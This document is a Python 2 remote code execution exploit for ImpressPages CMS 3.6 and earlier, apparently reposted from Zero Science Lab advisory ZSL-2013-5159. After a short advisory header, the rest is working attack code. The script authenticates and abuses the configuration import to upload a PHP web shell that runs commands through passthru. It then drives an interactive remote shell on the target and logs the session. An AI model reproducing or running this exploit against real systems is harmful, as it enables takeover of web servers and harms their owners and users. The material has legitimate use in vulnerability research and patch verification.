###########################

# ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit

###########################

#!/usr/bin/python
#
#
# ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit
#
#
# Vendor: ImpressPages UAB
# Product web page: http://www.impresspages.org
# Affected version: 3.6, 3.5 and 3.1
#
# Summary: ImpressPages CMS is an open source web content management system with
# revolutionary drag & drop interface.
#
# Desc: The vulnerability is caused due to the improper verification of uploaded
# files in '/ip_cms/modules/developer/config_exp_imp/manager.php' script thru the
# 'manage()' function (@line 65) when importing a configuration file. This can be
# exploited to execute arbitrary PHP code by uploading a malicious PHP script file
# that will be stored in '/file/tmp' directory after successful injection.
# Permission Developer[Modules exp/imp] is required (parameter 'i_n_2[361]' = on)
# for successful exploitation.
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
# GNU/Linux CentOS 6.3 (Final)
# Apache 2.4.2 (Win32) / Apache2
# PHP 5.4.7 / PHP 5.3.21
# MySQL 5.5.25a
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2013-5159
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5159.php
#
# Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
#
#
# 12.10.2013
#

ver = '1.0.0.000251'

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re

from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError

init()

if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])

def bannerche():
print """
@---------------------------------------------------------------@
| |
| ImpressPages CMS 3.6 RCE 0day |
| |
| |
| ID: ZSL-2013-5159 |
| |
| Copyleft (c) 2013, Zero Science Lab |
| |
@---------------------------------------------------------------@
"""
if len(sys.argv) < 3:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk impresspages\n'
sys.exit()

bannerche()

print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET

host = sys.argv[1]
path = sys.argv[2]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

try:
opener.open('http://'+host+'/'+path+'/admin.php')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
sys.exit()

print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
token_chk = opener.open('http://'+host+'/'+path+'/admin.php')
response = token_chk.read()
match = re.search('(?<=security_token=)\w+', response)
sectoken = match.group(0)

print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')

login_data = urllib.urlencode({
'f_name' : username,
'f_pass' : password,
'action' : 'login'
})

login = opener.open('http://'+host+'/'+path+'/admin.php?action=login&security_token='+sectoken, login_data)
auth = login.read()
for session in cj:
sessid = session.name

ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)

print '\x20\x20[*] Mapping Session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET+'\x20'+'.'*(46 - len(cookie))+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Mapping security token '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Token: '+Fore.YELLOW+sectoken+Fore.RESET+'\x20'+'.'*15+Fore.GREEN+'[OK]'+Fore.RESET

if re.search(r'Incorrect name or password', auth):
print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
sys.exit()
elif re.search(r'Your login suspended for one hour', auth):
print '\x20\x20[*] Your username is suspended for 1 hour '+'.'*17+Fore.RED+'[ER]'+Fore.RESET
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET

class MultiPartForm(object):

def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return

def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary

def add_field(self, name, value):
self.form_fields.append((name, value))
return

def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return

def __str__(self):

parts = []
part_boundary = '--' + self.boundary

parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)

parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)

flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)

if __name__ == '__main__':

form = MultiPartForm()
form.add_field('spec_security_code', '12345678901234567890123456789012')
form.add_field('spec_rand_name', 'lib_php_form_standard_1_')

form.add_file('config', 'liwo.php',
fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo
\"</pre>\"; ?>'))

request =
urllib2.Request('http://'+host+'/'+path+'/admin.php?module_id=361&action=import&security_token='+sectoken)
request.add_header('User-agent', 'joxypoxy 1.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()

print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
furl = '/admin.php?module_id=361&action=import_uploaded&security_token='

def osys():
cmd = 'uname'
execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
reverse = execute.read()
if re.search(r'Linux', reverse, re.IGNORECASE):
cmd = 'pwd'
print Style.DIM+Fore.WHITE
print '\n\x20\x20[*] Coins: 1'
print '\x20\x20[*] Detected platform: Linux'
print '\x20\x20[*] Type \'exit\' to leave'
print '\x20\x20[*] Choose your CMDs wisely'
print '\x20\x20[*] Your current location:'
print Style.RESET_ALL+Fore.RESET
return cmd
else:
cmd = 'cd'
print Style.DIM+Fore.WHITE
print '\n\x20\x20[*] Coins: 1'
print '\x20\x20[*] Detected platform: Windows'
print '\x20\x20[*] Type \'exit\' to leave'
print '\x20\x20[*] Choose your CMDs wisely'
print '\x20\x20[*] Your current location:'
print Style.RESET_ALL+Fore.RESET
return cmd

print

today = datetime.date.today()
fname = 'impress-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)

logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log generated on: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: ImpressPages CMS 3.6 manage() Function Remote Code Execution')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+ver)
logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl+sectoken)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2013-5159')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')

print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
if cmd.strip() == '':
cmd = osys()

execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)

print Style.BRIGHT+Fore.CYAN
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print Style.RESET_ALL+Fore.RESET

if cmd.strip() == 'exit':
break

logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
except Exception:
break

logging.warning('\n\n END OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] File '+Fore.YELLOW+fname+Fore.RESET+'\x20'+'.'*19+Fore.GREEN+'[OK]'+Fore.RESET

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2013-11-01]

###########################